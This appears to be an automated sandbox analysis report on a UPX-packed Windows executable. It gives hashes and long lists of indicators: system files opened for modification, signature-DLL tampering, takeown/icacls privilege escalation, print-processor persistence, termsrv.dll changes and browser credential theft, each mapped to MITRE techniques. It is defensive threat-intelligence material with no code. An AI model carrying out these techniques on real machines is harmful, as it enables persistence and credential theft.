d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97

Analysis

max time kernel
120s
max time network
96s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
01-12-2024 15:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97N.exe
Size

97KB
MD5

35d32ac777d694188d6bd2a89e541250
SHA1

6ee4cebbfc71483cd19e6dd01eceaa583cf976a1
SHA256

d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97
SHA512

4e2ac2282653247db5ab6983292b7fb529a86286ca868cef6b2ceb70450ec870a266eb8c21467a4eb04035fd0fc71ce5ffb36d2d0986233bdb1e6c2471ae5702
SSDEEP

3072:MwavFbFSymUJlum6XhJTeiWswHQVcScs7e3/0o:MnvFbFfV7udxteiWpQVcEe3M

Score

8^/10

discovery exploit persistence spyware stealer upx

Malware Config

Signatures

Drops file in Drivers directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\en-US\afd.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\iorate.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\winhv.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\http.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\TsUsbGD.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\ndiswan.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\dumpsd.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\mouclass.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\mskssrv.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\vhdmp.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\vms3cap.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\pciide.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\cmimcext.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\kdnic.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\npsvctrig.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\partmgr.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\rdbss.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\fltMgr.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\mup.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\PktMon.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\tunnel.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\netvsc.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\dumpsdport.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\storqosflt.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\vwifimp.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\kbdhid.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\FWPKCLNT.SYS	cmd.exe
File opened for modification	C:\Windows\System32\drivers\rhproxy.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\volume.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\mpsdrv.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\mup.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\qwavedrv.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\sbp2port.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\vmgid.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\Wdf01000.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\pnpmem.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\processr.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\usbstor.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\ipfltdrv.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\monitor.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\usbprint.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\netvsc.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\hvsocket.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\usbhub.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\flpydisk.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\http.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\mshidumdf.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\synth3dvsc.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\exfat.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\HdAudio.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\RNDISMP.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\pci.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\pmem.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\refsv1.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\NDKPing.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\tsusbhub.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\usbccgp.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\rdpvideominiport.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\wmilib.sys	cmd.exe
File opened for modification	C:\Windows\SysWOW64\drivers\gmreadme.txt	cmd.exe
File opened for modification	C:\Windows\System32\drivers\BthHfEnum.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\pdc.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\UMDF\IddCx.dll	cmd.exe
File opened for modification	C:\Windows\System32\drivers\wanarp.sys	cmd.exe

Manipulates Digital Signatures 4 IoCs

Attackers can apply techniques such as modifying certain DLL exports to make their binary seem valid.

description	ioc	Process
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll	cmd.exe
File opened for modification	C:\Windows\System32\wintrust.dll	cmd.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\pwrshsip.dll	cmd.exe
File opened for modification	C:\Windows\SysWOW64\wintrust.dll	cmd.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
3216	takeown.exe
1764	icacls.exe

Boot or Logon Autostart Execution: Print Processors 1 TTPs 1 IoCs

Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation.

persistence

Print Processors

T1547.012

description	ioc	Process
File opened for modification	C:\Windows\System32\spool\prtprocs\x64\winprint.dll	cmd.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3216	takeown.exe
1764	icacls.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\WinSxS\AMBE63~1.1_N\desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMA114~1.423\desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM82AF~1.1_N\desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM3CA2~1.1_N\desktop.ini	cmd.exe

Drops autorun.inf file 1 TTPs 1 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File opened for modification	C:\Windows\BITLOC~1\autorun.inf	cmd.exe

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\de-DE\qedit.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\de-DE\hiddigi.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\en-US\winresume.efi.mui	cmd.exe
File opened for modification	C:\Windows\System32\uk-UA\TtlsCfg.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\wevtsvc.dll	cmd.exe
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\Modules\NetLbfo\MSFT_NetLbfoTeamNic.cdxml	cmd.exe
File opened for modification	C:\Windows\System32\Dism\ja-JP\DmiProvider.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\es-ES\netrast.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\ja-JP\hidcfu.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\X_80.contrast-white.png	cmd.exe
File opened for modification	C:\Windows\SysWOW64\en-US\PresentationHost.exe.mui	cmd.exe
File opened for modification	C:\Windows\System32\de-DE\dggpext.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\it-IT\bthci.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\NcdAutoSetup.dll	cmd.exe
File opened for modification	C:\Windows\System32\en-US\dxdiagn.dll.mui	cmd.exe
File opened for modification	C:\Windows\SysWOW64\DWWIN.EXE	cmd.exe
File opened for modification	C:\Windows\System32\de-DE\AdmTmpl.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\en-US\winusb.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms005.inf_amd64_add71423ba73e797\prnms005.inf	cmd.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BITLOC~1\ja-JP\BitLocker.psd1	cmd.exe
File opened for modification	C:\Windows\System32\de-DE\bootsect.exe.mui	cmd.exe
File opened for modification	C:\Windows\System32\it-IT\wuapi.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\ja-jp\TelephonyInteractiveUserRes.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\fr-FR\wdma_usb.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\en-US\ActiveSyncProvider.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\downlevel\api-ms-win-core-privateprofile-l1-1-1.dll	cmd.exe
File opened for modification	C:\Windows\System32\it-IT\vaultsvc.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\F12\msdbg2.dll	cmd.exe
File opened for modification	C:\Windows\System32\th-TH\quickassist.exe.mui	cmd.exe
File opened for modification	C:\Windows\SysWOW64\fr-FR\shutdown.exe.mui	cmd.exe
File opened for modification	C:\Windows\System32\Windows.ApplicationModel.Store.TestingFramework.dll	cmd.exe
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\Modules\NetLbfo\MSFT_NetLbfoTeam.cdxml	cmd.exe
File opened for modification	C:\Windows\SysWOW64\cscript.exe	cmd.exe
File opened for modification	C:\Windows\System32\cs-CZ\mlang.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\ja-jp\provsvc.dll.mui	cmd.exe
File opened for modification	C:\Windows\SysWOW64\de-DE\cmmon32.exe.mui	cmd.exe
File opened for modification	C:\Windows\SysWOW64\ja-JP\msfeedsbs.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\dsc\de-DE\DscCoreR.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\IME\IMEKR\imkrapi.dll	cmd.exe
File opened for modification	C:\Windows\System32\SystemSettings.DataModel.dll	cmd.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PrintManagement\MSFT_LprPrinterPort.format.ps1xml	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\de-DE\WUDFUsbccidDriver.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\netr28ux.inf_amd64_d5996f2a9d9aa9e3\netr28ux.sys	cmd.exe
File opened for modification	C:\Windows\System32\Windows.System.Profile.HardwareId.dll	cmd.exe
File opened for modification	C:\Windows\System32\it-IT\iassdo.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\ja-jp\edptask.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\wbem\storagewmi_passthru_uninstall.mof	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\ja-JP\msmouse.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\ja-jp\MDEServer.exe.mui	cmd.exe
File opened for modification	C:\Windows\System32\wbem\ntfs.mof	cmd.exe
File opened for modification	C:\Windows\SysWOW64\wmdmps.dll	cmd.exe
File opened for modification	C:\Windows\System32\kdnet.dll	cmd.exe
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Archive\it-IT\ArchiveResources.psd1	cmd.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\NetEventPacketCapture\MSFT_NetEventNetworkAdapter.format.ps1xml	cmd.exe
File opened for modification	C:\Windows\SysWOW64\wbem\PrintManagementProvider.dll	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\ja-JP\usbhub3.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\en-US\iscsicli.exe.mui	cmd.exe
File opened for modification	C:\Windows\SysWOW64\AcLayers.dll	cmd.exe
File opened for modification	C:\Windows\System32\es-ES\imapi2.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\es-ES\sdiagschd.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\fr-FR\wlanutil.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\fr-FR\dsreg.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\ja-jp\DscProxy.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\WindowsCodecsRaw.txt	cmd.exe

Modifies termsrv.dll 1 TTPs 1 IoCs

Commonly used to allow simultaneous RDP sessions.

Remote Desktop Protocol

T1021.001

description	ioc	Process
File opened for modification	C:\Windows\System32\termsrv.dll	cmd.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3868-0-0x00007FF679F50000-0x00007FF679FAA000-memory.dmp	upx
behavioral2/memory/3868-2-0x00007FF679F50000-0x00007FF679FAA000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\PROGRA~1\WindowsApps\MID483~1.0_X\Assets\GE2385~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MICB88~1.0_X\Assets\AppTiles\AppIcon.targetsize-80_altform-lightunplated.png	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI32BC~1.0_X\Assets\CONTRA~2\LARGEL~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~2\WindowsPowerShell\Modules\Pester\3.4.0\Pester.nuspec	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI11B4~1.0_X\images\TXP_PA~2.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI4E5E~1.SCA\APPXBL~1.XML	cmd.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Resource\CMap\IDENTI~2	cmd.exe
File opened for modification	C:\PROGRA~3\MICROS~1\Windows\AppRepository\MI4419~1.XML	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI0A11~1.0_X\OFFICE~2.DLL	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MIB44A~1.0_X\Assets\PROGRA~4.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI11B4~1.0_X\images\CONTRA~2\HXA-EX~3.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI11B4~1.0_X\images\HxCalendarBadge.scale-125.png	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MID483~1.0_X\WHATSN~1.DLL	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI6F49~1.0_X\Assets\Images\Stickers\THUMBN~1\ST3DDD~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MICB88~1.0_X\Assets\AppTiles\CONTRA~1\AP53E8~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\ink\Microsoft.Ink.dll	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI6132~1.0_X\Assets\CONTRA~2\AppList.targetsize-32_altform-unplated_contrast-white.png	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI11B4~1.0_X\images\EMPTYV~2.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI4DB5~1.0_X\Assets\AppTiles\CONTRA~1\MAFC92~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI2B2D~1.0_X\Assets\VALUEP~2.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI46F3~1.0_X\Assets\CONTRA~2\PeopleAppList.targetsize-96.png	cmd.exe
File opened for modification	C:\PROGRA~2\INTERN~1\ExtExport.exe	cmd.exe
File opened for modification	C:\PROGRA~2\REFERE~1\MICROS~1\FRAMEW~1\v3.0\ja\System.Printing.resources.dll	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MID54F~1.0_X\Assets\PHBF10~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI11B4~1.0_X\images\CONTRA~1\HX8FE8~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI11B4~1.0_X\images\CONTRA~2\HxCalendarAppList.targetsize-64.png	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI11B4~1.0_X\images\offsymsb.ttf	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MID483~1.0_X\Assets\GetStartedAppList.targetsize-80_altform-unplated.png	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI0A11~1.0_X\images\ONENOT~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI10D6~1.0_X\Assets\AppList.targetsize-32_altform-unplated.png	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI10D6~1.0_X\Assets\CONTRA~1\AppList.targetsize-24_contrast-black.png	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI83BA~1.0_X\Assets\ThankYou\GENERI~1.JPG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI418F~1.0_N\APPXBL~1.XML	cmd.exe
File opened for modification	C:\PROGRA~3\MICROS~1\Windows\AppRepository\Packages\E2A4F9~1.102\ACTIVA~1.DAT	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI6712~1.SCA\Assets\SPLASH~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI0A7F~1.0_X\Assets\CONTRA~1\APPLIS~3.PNG	cmd.exe
File opened for modification	C:\PROGRA~3\MICROS~1\Windows\AppRepository\MIE7AA~1.XML	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MICB88~1.0_X\Assets\AppTiles\AP2AA8~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MID53B~1.0_X\Assets\tinytile.targetsize-48_altform-unplated_contrast-black.png	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI0A11~1.0_X\images\CONTRA~1\ONB497~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MIB28C~1.0_X\AVDEVI~1.DLL	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MIBE99~1.0_X\Assets\GA4993~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~3\MICROS~1\Windows\AppRepository\Packages\MI8DAD~1.102\ACTIVA~1.LOG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI6712~1.SCA\APPXSI~1.P7X	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI6132~1.0_X\Assets\AppList.scale-100.png	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI11B4~1.0_X\images\GenericMailLargeTile.scale-125.png	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MIEACE~1.0_X\Assets\VOA830~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\en-US\tabskb.dll.mui	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI11B4~1.0_X\images\FETCHI~3.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI4DB5~1.0_X\Assets\SECOND~1\Home\CONTRA~2\WIDETI~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~3\MICROS~1\Windows\AppRepository\MI3738~1.XML	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MICROS~3.0_X\Assets\AppTiles\WEATHE~2\210x173\2.jpg	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MID5E5~1.0_X\Assets\CONTRA~2\LargeTile.scale-100_contrast-white.png	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MID54F~1.0_X\PHOTOS~2.DLL	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MIB44A~1.0_X\Assets\CalculatorAppList.contrast-white_targetsize-48.png	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI11B4~1.0_X\images\CONTRA~1\OutlookMailMediumTile.scale-150.png	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MICB88~1.0_X\Assets\AppTiles\AppIcon.targetsize-60_altform-lightunplated.png	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI4E5E~1.SCA\Assets\CONTRA~2\SMALLL~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~3\MICROS~1\Windows\AppRepository\Packages\MIDB7B~1.102\ACTIVA~2.LOG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI0835~1.SCA\Assets\TINYTI~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MIEA2E~1.0_X\Assets\SQ22F9~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI6132~1.0_X\Assets\WideTile.scale-125.png	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI11B4~1.0_X\images\CONTRA~1\LIBFB3~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\IpsPlugin.dll	cmd.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\servicing\Packages\Microsoft-Windows-OfflineFiles-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM8A3C~1.1_E\IPOIB6~1.INF	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM9C5E~1.1_E\DNSHCD~1.MUI	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMDEB6~1.746\RE0348~1.PNG	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMEC95~1.867\C_720.NLS	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMEC95~1.867\n\C_G18030.DLL	cmd.exe
File opened for modification	C:\Windows\Fonts\s8514oem.fon	cmd.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WPF\NlsLexicons000a.dll	cmd.exe
File opened for modification	C:\Windows\servicing\Packages\Microsoft-Windows-TerminalServices-Publishing-WMIProvider-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat	cmd.exe
File opened for modification	C:\Windows\Speech_OneCore\Engines\SR\fr-FR-N\l1036.smp	cmd.exe
File opened for modification	C:\Windows\SystemApps\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Experiences\PreInstalledApps\DefaultSquareTileLogo1.contrast-black_scale-80.png	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMBFCB~1.1_J\HALEXT~1.INF	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM2A97~1.1_E\UEVAGE~1.MUI	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM11B0~1.128\f\cldapi.dll	cmd.exe
File opened for modification	C:\Windows\servicing\Packages\Microsoft-Windows-Host-Guardian-Deployment-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat	cmd.exe
File opened for modification	C:\Windows\servicing\Packages\MIBA27~1.CAT	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMEB2D~1.1_N\WIDELO~1.PNG	cmd.exe
File opened for modification	C:\Windows\SystemApps\Microsoft.Windows.FilePicker_cw5n1h2txyewy\AppxManifest.xml	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM34A4~1.1_N\msiscsi.sys	cmd.exe
File opened for modification	C:\Windows\servicing\Packages\Microsoft-Windows-PhotoBasic-WOW64-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat	cmd.exe
File opened for modification	C:\Windows\servicing\Packages\MIF971~2.CAT	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMCC76~1.1_J\VMSERI~1.MUI	cmd.exe
File opened for modification	C:\Windows\INF\mdmcdp.inf	cmd.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\de\aspnet.mfl.uninstall	cmd.exe
File opened for modification	C:\Windows\SystemApps\Windows.CBSPreview_cw5n1h2txyewy\pris\resources.ja-JP.pri	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM7060~1.102\f\APPXBL~1.XML	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM5F90~1.126\f\OOBELO~1.HTM	cmd.exe
File opened for modification	C:\Windows\WinSxS\AME9FD~1.1_E\COMDLG~1.MUI	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM7D6A~1.1_N\ALLOWB~1.ADM	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM5F90~1.126\f\CL9F87~1.WIN	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM5F90~1.126\NOINTE~1.HTM	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM3226~1.126\eappgnui.dll	cmd.exe
File opened for modification	C:\Windows\Speech_OneCore\Engines\TTS\it-IT\M1040Cosimo.SPEECHUX.NUS	cmd.exe
File opened for modification	C:\Windows\SystemApps\MICROS~1.SEC\Assets\SplashScreen.contrast-black_scale-200.png	cmd.exe
File opened for modification	C:\Windows\WinSxS\AME2FF~1.746\f\HVSIDS~1.DLL	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMA908~1.1_D\IEADVP~1.MUI	cmd.exe
File opened for modification	C:\Windows\SystemApps\microsoft.creddialoghost_cw5n1h2txyewy\pris\resources.es-ES.pri	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM5C03~1.1_E\GPUPVD~1.MUI	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM058B~1.1_N\DEFAUL~1.DLL	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM842C~1.102\explorer.exe.mui	cmd.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.tlb	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM9B0B~1.120\certcli.dll	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM67D2~1.1_U\APPBAC~2.MFL	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMB09F~1.1_U\GPEDIT~1.MUI	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMC848~1.1_E\ELSCOR~1.MUI	cmd.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\V20~1.507\Microsoft.Common.Tasks	cmd.exe
File opened for modification	C:\Windows\SystemApps\MICROS~1.SEC\Assets\Square71x71Logo.contrast-white_scale-400.png	cmd.exe
File opened for modification	C:\Windows\servicing\Packages\MI4332~1.CAT	cmd.exe
File opened for modification	C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\core\js\appLaunchers\OobeAutoPilot.js	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMD1BC~1.1_E\ARCSAS~1.INF	cmd.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\es\System.Web.resources.dll	cmd.exe
File opened for modification	C:\Windows\servicing\INBOXF~1\metadata\LAE03C~1.MUM	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMAD8C~1.102\APPXMA~1.XML	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMA1D6~1.207\f\ADAMMS~1.MUI	cmd.exe
File opened for modification	C:\Windows\WinSxS\AME1F2~1.1_E\DISKRA~1.MUI	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM140F~1.0_N\CASPOL~1.CON	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMCE03~1.120\appidsvc.dll	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM1FAB~1.84_\@WINDO~1.GIF	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMA929~1.1_N\BCD	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMD64_~3.1_Z\BOOTMG~1.MUI	cmd.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v3.5\msbuild.exe.config	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM43D9~1.1_N\NET750~1.INF	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM9165~1.906\coadmin.dll	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM297A~1.1_I\ARCSAS~1.INF	cmd.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchApp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchApp.exe

